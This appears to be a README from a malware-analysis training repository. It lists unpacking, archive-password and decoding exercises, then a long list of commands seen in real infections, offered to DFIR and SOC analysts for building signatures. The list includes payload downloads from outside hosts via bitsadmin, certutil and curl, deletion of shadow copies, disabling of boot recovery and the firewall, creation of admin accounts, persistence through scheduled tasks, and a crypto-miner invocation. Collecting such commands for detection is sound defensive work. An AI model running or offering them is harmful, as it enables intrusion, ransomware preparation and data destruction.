Unpack Me

Unpacking is fun! (or not :P)
pwd : infected

UPX
ConfuserEx
ILprotector
Phoenix Protector

Decompress Me

Sometimes, attackers are sending by email some password protected archives.
The problem is... When the analyst is receiving the archive, the customer forgot to send him the email who contains the password...
So, the only thing that you have to do, if you must analyze this... you have to find the password \o/

Case 01
Case 02
Case 03

Decode Me

Disclamer : This is real cases of malicious encoding commands used during infections.
It's highly recommended to manipulate these on a Virtual Machine !
I am not responsible for your acts pwd : infected

Case 01
Case 02
Case 03
Case 04
Case 05
Case 06
Case 07
Case 08
Case 09
Case 10
Case 11
Case 12
Case 13
Case 14
Case 15
Case 16
Case 17
Case 18
Case 19
Case 20
Case 21

Examples of commands used by Attackers

For DFIR / CERT / SOC Analysts, this is a good start for signatures and learning some stuff

Disclamer : This is real cases of commands. (good or malicious)
I am not responsible for your acts

attrib +h "%APPDATA%\tmp_000"
attrib +r +a +s +h "%APPDATA%\Adobe Reader\ADBR\READER"
attrib +s +a %WINDIR%\Fonts
attrib +s +h +r "%APPDATA%\Process\*.*"
attrib -r -a -s -h -i /s C:\Users\%OSUSER%
autorun.exe "SFXSOURCE:%TEMP%\Temp\chewvga.EXE"
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled No
bitsadmin /complete QaeGF
bitsadmin /create /download QaeGF
bitsadmin /setcustomheaders QaeGF User-Agent:LACARNECOTTA
bitsadmin /transfer AE /priority foreground https://jgc.com.mx/dat/heavy.jpg %USERPROFILE%\document.exe
bitsadmin /Resume wstatus
bitsadmin /SetNotifyCmdLine wstatus "%ALLUSERSPROFILE%\Oracle\hok\jahok.exe" "update"
bitsadmin /cancel drp_bits_job
bitsadmin /transfer Nv /priority foreground http://154.16.201.215:2330/ari.exe %USERPROFILE%\RK.exe
cacls %ALLUSERSPROFILE%\expl0rer.exe /d everyone
cacls C:\Users\%OSUSER% /T /C /P %OSUSER% :F
certutil -addstore "Root" p.pem
certutil -addstore -f "TrustedPublisher" "%PROGRAMFILES%\OpenVPN Technologies\PrivateTunnel\Cert\OpenVPNTechForTap6.cer"
certutil -decode %TEMP%\B %TEMP%\y.bat
certutil -A -n "root" -t "TCu,Cuw,Tuw" -i "rootcert.cer" -d "%APPDATA%\Mozilla\Firefox\Profiles/fg6ygf16.default"
certutil -f -addStore root "%TEMP%\is-5OHTO.tmp\BaltimoreCyberTrustRoot.crt"
certutil -f -decode %ALLUSERSPROFILE%\Windows\Microsoft\java\dUpdateCheckers.base d.ps1
certutil -urlcache -split -f http://cache.windowsdefenderhost.com/windows/RecentFileProgrom.exe "C:\\Windows\\Fonts\\RecentFileProgrom.exe"
choice /C Y /N /D Y /T 3
choice /t 3 /d y /n
cmstp.exe /s /ns "%APPDATA%\Microsoft\10850.txt"
cmstp.exe /s /su /ns df81c455-615e-4add-92e3-ce4a12d882d8.inf
conhost.exe "-1036909723-245440756159895655010408828331479810903-3149622581357818589-674575599"
conhost.exe schtasks /create /tn "svchost" /tr "%WINDIR%\resources\svchost.exe" /sc daily /st 17:00 /f
csc.exe /noconfig /fullpaths @"%TEMP%\-h_g5jfn.cmdline"
cscript %TEMP%\file.vbs
cscript //nologo \\tK2PgXIebP\BIN\PreviousDate.vbs
csv.exe %TEMP%\83890727\AARIA
csv.exe dic=ngi
curl.exe -o new.exe http://down.pzchao.com:18559/new.exe
curl.exe -o pass32.exe http://down.pzchao.com:18559/pass32.exe -u 123:456
cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES1055.tmp" "%TEMP%\CSC1036.tmp"
delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
delete HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v "Windows Defender" /f
delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v WindowsDefender /f
devcfg.exe -add net vnet %PROGRAMFILES%\ShrewSoft\VPN Client\drivers\virtualnet.inf
dllhost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}
dw20.exe -x -s 1080
explorer.exe /c, "%APPDATA%\Microsoft\Windows\Start Menu\Programs\scanned.exe"
explorer.exe schtasks /create /tn "svchost" /tr "%WINDIR%\resources\svchost.exe" /sc daily /st 14:59 /f
find "."
find /i " "
find /i " 1"
find /i ".exe"
find /i "\\"
findstr /i "ping"
findstr 0.0.0.0.*0.0.0.0
findstr [0-99]
findstr.exe findstr /C:"-"
icacls . /grant Everyone:F /T /C /Q
ipconfig /all
ipconfig /flushdns
javaw.exe -jar "C:\07afffd621bd06f571b35fac6266abcec66ca8711102dd9a5e500ee897735190.jar"
mshta.exe "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta"
msiexec /i "%TEMP%\VCRedist\VCRedist_2005_x86\8.0.50727.6195\vcredist.msi" /qn
msiexec /quiet /uninstall {70895169-F9EC-432C-9FC9-4F4761019739}
msiexec /x "\\atbwfs100\Sourcing\Fit Tracking\03152007\FitTrackingUI.msi" /qn
net config workstation
net localgroup "Remote Desktop Users" Matthew /add
net localgroup administrators Matthew /add
net session
net start "Data Sharing Service"
net stop TeamViewer
net stop osppsvc /y
netsh advfirewall firewall add rule name="DriverPack aria2c.exe" dir=in action=allow program="%TEMP%\7ZipSfx.001\bin\tools\aria2c.exe"
netsh advfirewall set allprofiles state off
netsh advfirewall set allprofiles state on
netsh int ipv6 isatap show state
netsh int tcp reset
netsh int tcp set heuristics disabled
nslookup -q=txt djowy612ygosvyd.com 208.67.220.220
nslookup -type=a %OSUSER%.check.francefriends.tk.
nslookup ransomware.bit ns1.wowservers.ru
nssm.exe /install /silent "iSASService" %PROGRAMFILES%\Java\jre1.8.0_25\bin\java.exe
ping -n 0 localhost
ping -n 1 127.0.0.1
ping -n 2 -w 1000 127.0.0.1
ping -t 2 -l 10 127.0.0.1
ping google.com
powershell.exe "-file" "C:\01674bf1099edd830c974553a4de062f42c5e6759adb6b4da7aadfdd838cc00c.ps1"
reg delete "HKCU\Software\Microsoft\Office\12.0\Word\Resiliency" /F
reg delete "HKCU\Software\Microsoft\Office\15.0\Word\Resiliency" /F
reg import %TEMP%\7ZipSfx.001\bin\Tools\\patch.reg
reg query "HKCU\Control Panel\International" /v sShortDate
regsvr32.exe /n /s "%TEMP%\instx86.tmp" /i:"/cp"
rundll32.exe %APPDATA%\ekcwlvi.dll f1
rundll32.exe %WINDIR%\system32\shell32.dll,OpenAs_RunDLL %TEMP%\rad3FE20.tmp
rundll32.exe shell32.dll,Control_RunDLL input.dll
sc.exe delete TeamViewer
sc.exe start TeamViewer
sc.exe stop TeamViewer
schtasks /create /sc minute /mo 1 /tn "HomeGroupProvider" /ru system /tr "cmd /c echo Y|cacls %WINDIR%\sxstruse.exe /p everyone:F"
schtasks.exe "schtasks" /create /tn "NRAT Client Startup" /sc ONLOGON /tr "%APPDATA%\Google\chrome.exe" /rl HIGHEST /f
schtasks.exe "schtasks" /create /tn "Windows© " /sc ONLOGON /tr "%APPDATA%\winfile\Microsoft©.exe" /rl HIGHEST /f
schtasks.exe "schtasks" /delete /tn "WebDiscover Browser Launch Task" /f
schtasks.exe /Create /RU system /SC ONLOGON /TN Microsoft\WindowsDifenderUpdate /TR "wscript %ALLUSERSPROFILE%\WindowsNT\WindowsNT.vbs" /F
schtasks.exe schtasks /delete /tn "Adobe Flash Player Updaters" /f
schtasks.exe schtasks /delete /tn "Microsoft\Windows\orangeinside" /f
schtasks.exe schtasks /delete /tn "Printerceptor" /f
schtasks.exe schtasks /delete /tn "\Microsoft\Windows\WDI\Adobe\Adobe Flash Updaters" /f
schtasks.exe schtasks /delete /tn 360 /f
schtasks.exe schtasks /delete /tn AutoKMSK /f
schtasks.exe schtasks /delete /tn AutoKMSKK /f
schtasks.exe schtasks /delete /tn SogouImeMgr /f
shutdown /p /f
shutdown -a
shutdown -r -f -t 5
shutdown -s -f -t 0
shutdown -s -t 100
shutdown /s /t 600 /f
ssh-keygen.exe -b 1024 -t dsa -f /ssh_host_dsa_key -N ""
subst.exe subst b: C:\
svchost.exe -k
takeown /f %WINDIR%\system32\Drivers\etc\hosts /a
taskkill /im rundll32.exe /f /T
tasklist /nh /fi "imagename eq .exe"
timeout /t 1 /nobreak
timeout /t 300
vbc.exe -o xmr.pool.minergate.com:45700 -u 1LwkS2UaXY5hrRxR7Kdxo625v41zeHGjxL --cpu-priority 3 --max-cpu-usage 75 --donate-level 1 -p x -t 2
vbc.exe /noconfig @"%TEMP%\apzjg8gs.cmdline"
vbc.exe /shtml "%TEMP%\v0xrvacf.goc"
vbc.exe /stext "%TEMP%\holdermail.txt"
vssadmin Delete Shadows /All /Quiet
vssadmin delete shadows /all
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
wget.exe http://127.0.0.1:9527 -o "C:\\TestWget.txt" -t 1
wmic /node:localhost /namespace:\\root\SecurityCenter2 path FirewallProduct get /format:list
wmic OS get Caption /value
wmic PAGEFILESET GET MaximumSize /value
wmic computersystem get domain
wmic logicaldisk where "DeviceID='C:'" get size
wmic nicconfig where(ipenabled=true) get index
wmic path Win32_Processor get Name /value
wmic path Win32_Processor get NumberOfCores /value
wmic process where "name='conhost.exe' and ExecutablePath='C:\\windows\\Installer\\conhost.exe'" call Terminate
wmic shadowcopy delete
wscript //Nologo "%PUBLIC%\Temp\%OSUSER%.vbs" CxNqfVybn9rBTqHTjjIhA3jiooCiJP5DlgROv3L5qhFsDi4GcAM
wscript /b %ALLUSERSPROFILE%\Windows\Microsoft\java\GoogleUpdateschecker.vbs
wscript /e:VBScript.Encode %TEMP%\SysinfY2X.db
wscript bnbgpnhp.js
xcopy /l /w "%TEMP%\4064BQBC.bat" "%TEMP%\4064BQBC.bat"
xcopy /Y /I /S "%TEMP%\NS-1Q8EJ.tmp\tmp\*" "%TEMP%\nsa694.tmp\"
xcopy /Y /I /S "%TEMP%\NS-2QOKH.tmp\tmp\*" "%TEMP%\nsa796.tmp\"